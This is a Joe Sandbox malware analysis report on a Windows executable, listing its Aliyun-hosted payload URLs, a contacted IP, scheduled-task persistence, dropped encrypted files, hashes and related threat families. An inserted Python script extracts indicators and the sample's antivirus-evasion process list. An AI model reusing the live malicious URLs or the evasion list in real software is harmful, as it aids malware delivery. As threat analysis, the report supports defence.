http://ocsp.thawte.com0 | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.dr | Malicious: false | Reputation: high
https://jylhok.oss-cn-beijing.aliyuncs.com/Zm | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/w | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/Vm | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/ | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/ | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.symauth.com/cps0( | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.dr | Malicious: false | Reputation: high
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1003 | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.dr | Malicious: false | Reputation: high
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.symauth.com/rpa00 | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.dr | Malicious: false | Reputation: high
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifws | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://jylhok.oss-cn-beijing.aliyuncs.com/C | Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
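Two of the raw string sets in this report need processing before they are usable as indicators: the AV process names the sample carries (the kxetray.exe ... K7TSecurity.exe list in the memory-strings entry above) and the C2 URLs, which come out of the memory dump with trailing bytes from whatever followed them (a.gifW, i.datta, b.gifk, and two URLs fused into one string). The following Python is an added example and is not part of the Joe Sandbox report or of the sample: it carves ASCII and UTF-16LE strings from a memory region, matches the process-name list, and collapses the noisy URL variants onto the clean set the report itself verifies (a.gif, b.gif, c.gif, d.gif, i.dat, s.dat, s.jpg). The memory region is constructed here from strings shown in the report, and the cut-off rule (a URL ends at the first path component with a .gif/.dat/.jpg extension) is an assumption that fits this bucket, not a general rule.

```python
"""Carve IOC strings from a process memory region and tidy them for use.

Added example for the sandbox report; not code from Joe Sandbox or from the
sample. SAMPLE_DUMP is constructed from strings the report shows, and the
URL cut-off rule in URL_END_RE is an assumption that fits this OSS bucket.
"""
import re
from typing import Dict, List, Set, Tuple

# Security-product process names the report lists from the sample's memory.
AV_PROCESS_NAMES = [
    "kxetray.exe", "vsserv.exe", "avcenter.exe", "KSafeTray.exe", "avp.exe",
    "360Safe.exe", "360tray.exe", "rtvscan.exe", "ashDisp.exe", "TMBMSRV.exe",
    "avgwdsvc.exe", "AYAgent.aye", "QUHLPSVC.EXE", "RavMonD.exe", "MsMpEng.exe",
    "K7TSecurity.exe",
]

# Constructed stand-in for a .sdmp region: ASCII and UTF-16LE strings separated
# by non-printable bytes, with URL tails polluted by whatever followed them.
SAMPLE_DUMP = (
    b"\x00\x00kxetray.exe\x00360tray.exe\x00\x01\x02"
    + "MsMpEng.exe".encode("utf-16le") + b"\x00\x00"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW\x00"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta\x00"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk\x00"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp\x00"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/q\x00"
    + b"https://jylhok.oss-cn-beijing.aliyuncs.com/s.dat\x00\xff\xfe"
)

MIN_LEN = 5
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)
# Lookahead so that two URLs fused into one string both get a match start.
URL_START_RE = re.compile(r"(?=(https?://[A-Za-z0-9.\-]+/[^\s\"'<>]*))")
# Assumption: a real URL in this bucket ends at the first "name.ext" path component.
URL_END_RE = re.compile(r"^(https?://[A-Za-z0-9.\-]+/[A-Za-z0-9_\-]+\.(?:gif|dat|jpg))")


def extract_strings(blob: bytes) -> List[str]:
    """Printable ASCII and UTF-16LE runs of at least MIN_LEN characters."""
    found = [m.group().decode("ascii") for m in ASCII_RE.finditer(blob)]
    found += [m.group().decode("utf-16le") for m in WIDE_RE.finditer(blob)]
    return found


def find_av_process_names(strings: List[str]) -> Set[str]:
    """Known security-product process names present (case-insensitive substring)."""
    hits: Set[str] = set()
    for s in strings:
        low = s.lower()
        hits.update(name for name in AV_PROCESS_NAMES if name.lower() in low)
    return hits


def normalise_urls(strings: List[str]) -> Tuple[Dict[str, List[str]], List[str]]:
    """Map each clean URL to the raw variants it was recovered from.

    Fragments with no recognisable file name ("/q", "/Zm") are returned in the
    rejected list rather than guessed at, so nothing is silently dropped.
    """
    clean: Dict[str, List[str]] = {}
    rejected: List[str] = []
    for s in strings:
        for m in URL_START_RE.finditer(s):
            raw = m.group(1)
            end = URL_END_RE.match(raw)
            if end:
                clean.setdefault(end.group(1), []).append(raw)
            else:
                rejected.append(raw)
    return clean, rejected


if __name__ == "__main__":
    strs = extract_strings(SAMPLE_DUMP)
    print("AV process names:", sorted(find_av_process_names(strs)))
    urls, dropped = normalise_urls(strs)
    for url, variants in sorted(urls.items()):
        print(url, "<-", variants)
    print("rejected fragments:", dropped)
```

To run it against a real region, read the .sdmp file as bytes in place of SAMPLE_DUMP. The rejected list is worth reviewing by hand: a one-letter path such as /q or /w may be a real endpoint of the bucket or just a cut-off string, and the report alone cannot tell the two apart.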
Contacted IPs:
IP: 39.103.20.48 | Domain: sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | Country: China | ASN: 37963 | ASN Name: CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co., Ltd | Malicious: false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585091
Start date and time: 2025-01-07 04:13:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 33s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 287438657364-7643738421.08.exe
Detection: MAL
Classification: mal80.evad.winEXE@4/12@1/1
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 58%
  • Number of executed functions: 12
  • Number of non-executed functions: 190
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 20.109.210.53
  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target O8xg2t.exe, PID 6880 because there are no executed functions
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:15:50 | Task Scheduler | Run new task: 8wPRd path: C:\Users\user\Documents\O8xg2t.exe
22:14:09 | API Interceptor | 941x Sleep call for process: 287438657364-7643738421.08.exe modified
Context for ASN CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co., Ltd (associated sample | detection | threat name | context IP):
x86_64.elf | malicious | Mirai | 8.171.83.51
i486.elf | malicious | Mirai | 47.107.186.79
arm4.elf | malicious | Mirai | 118.178.206.165
2.elf | malicious | Unknown | 60.205.221.193
1.elf | malicious | Unknown | 47.107.3.205
3.elf | malicious | Unknown | 8.184.34.244
2749837485743-7684385786.05.exe | malicious | Nitol | 39.103.20.26
2749837485743-7684385786.05.exe | malicious | Unknown | 39.103.20.26
cZO.exe | malicious | Unknown | 120.77.100.135
z0r0.m68k.elf | malicious | Mirai | 8.133.115.153

Context for IP 39.103.20.48 (associated sample | detection | threat name | context IP):
37f463bf4616ecd445d4a1937da06e19u1XWB0BIju.msi | malicious | Unknown | 39.103.20.48
setup.msi | malicious | Unknown | 39.103.20.48
2749837485743-7684385786.05.exe | malicious | Nitol | 39.103.20.48
2749837485743-7684385786.05.exe | malicious | Unknown | 39.103.20.48
drop1.exe | malicious | CredGrabber, Meduza Stealer | 39.103.20.48
ZT0KQ1PC.exe | malicious | PureLog Stealer, Vidar | 39.103.20.48
LinxOptimizer.exe | malicious | Unknown | 39.103.20.48
setup.msi | malicious | Unknown | 39.103.20.48
drop1.exe | malicious | CredGrabber, Meduza Stealer | 39.103.20.48

Context for dropped file C:\Users\user\Documents\O8xg2t.exe (associated sample | detection | threat name):
2749837485743-7684385786.05.exe | malicious | Nitol
2749837485743-7684385786.05.exe | malicious | Unknown
2b687482300.6345827638.08.exe | malicious | Unknown
2b687482300.6345827638.08.exe | malicious | Unknown
45631.exe | malicious | Nitol
45631.exe | malicious | Unknown
0000000000000000.exe | malicious | Nitol
0000000000000000.exe | malicious | Unknown
T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol
Process: C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category: dropped
Size (bytes): 8299
Entropy (8bit): 7.9354275320361545
Encrypted: false
SSDEEP: 192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5: 9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1: D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256: 5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512: 5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious: false
Reputation: moderate, very likely benign file
Preview: (binary JFIF/Exif image data; raw preview omitted)
Process: C:\Users\user\Desktop\287438657364-7643738421.08.exe
File Type: PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):10681
                                Entropy (8bit):7.866148090449211
                                Encrypted:false
                                SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                MD5:10A818386411EE834D99AE6B7B68BE71
                                SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):512
                                Entropy (8bit):5.2008868627450004
                                Encrypted:false
                                SSDEEP:6:W7pdRda+CrCa2BIDR/yYWRudduXCCmZ7OdUzW9E40/qcX:mpUMBIDR/yYWRudduXCCmdgUzWg3
                                MD5:6FE90B6ABE6C4D1079B730F10120B3D1
                                SHA1:EEEC97FDCF98EEA2A53C033D5ECC75D5C3A0C438
                                SHA-256:9EB8597171F3CDF8892B9DEC93A4E2D63DE7D2D9B28B823FB374E111583B55F5
                                SHA-512:161CF27D69434B4049EA47B2E0AE9283B820DBF8659B3B5CDACCC7FF3CEEF1DBBB3DB7A58CD2AFE7617E3BE866C6E26CA14B30BF6464EBA4C75764715F700C2B
                                Malicious:false
                                Reputation:low
                                Preview:....l%00ZI\X73v7DD.T:y61X[X_8q>3ZJF]>.s>QS._q86999999999999999999999999999999999QMMI:sff....ae a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33YJ_[40u4GG.W9z52[X[\;r=0YIE^=-p=RP.^p97888888888888888888888888888888888PLLH;rgg....`d!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):135589
                                Entropy (8bit):7.995304392539578
                                Encrypted:true
                                SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                SHA1:561836F6228E24180238DF9456707A2443C5795C
                                SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):3892010
                                Entropy (8bit):7.995495589600101
                                Encrypted:true
                                SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                Malicious:false
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                Category:dropped
                                Size (bytes):125333
                                Entropy (8bit):7.993522712936246
                                Encrypted:true
                                SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                MD5:2CA9F4AB0970AA58989D66D9458F8701
                                SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                Malicious:false
                                Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):28272
                                Entropy (8bit):7.711627336404117
                                Encrypted:false
                                SSDEEP:384:9eegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ8:B5F1FUdy422IK+gAZt2i0YPpQn4GMr
                                MD5:B49BF11DC361D426B398BB8C06DCFBFC
                                SHA1:815737B9770BF4404AE201BA9AD4ECA7E286F0BF
                                SHA-256:F3C2B3590B51FFB26D50E95C3B6D7DAC81F09AFE96E209723D920C0B4BEF07AA
                                SHA-512:DA049725398577C8F3D7224D61462614EA56E5A8350A1B86E5085BD8BA575F8FA7FCFC55BA4B7234360D9838579AAB5B14366896F27AA5A6446AD91A8C66DF09
                                Malicious:false
                                Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb$bcbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                Process:C:\Users\user\Desktop\287438657364-7643738421.08.exe
                                File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):3889557
                                Entropy (8bit):7.999938753862441
                                Encrypted:true
                                SSDEEP:98304:LAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:EndLOZS/DtpPJRO8OHBL4f2UQI+A
                                MD5:97057F6C160572D66FD8942F28133297
                                SHA1:42CB5891A893AAF769E7E963816BE7B74766DEEE
                                SHA-256:FA9EE3D12826110846C95845141CFF32154A3EB924DD5BB3A1BE9931C40FEC1B
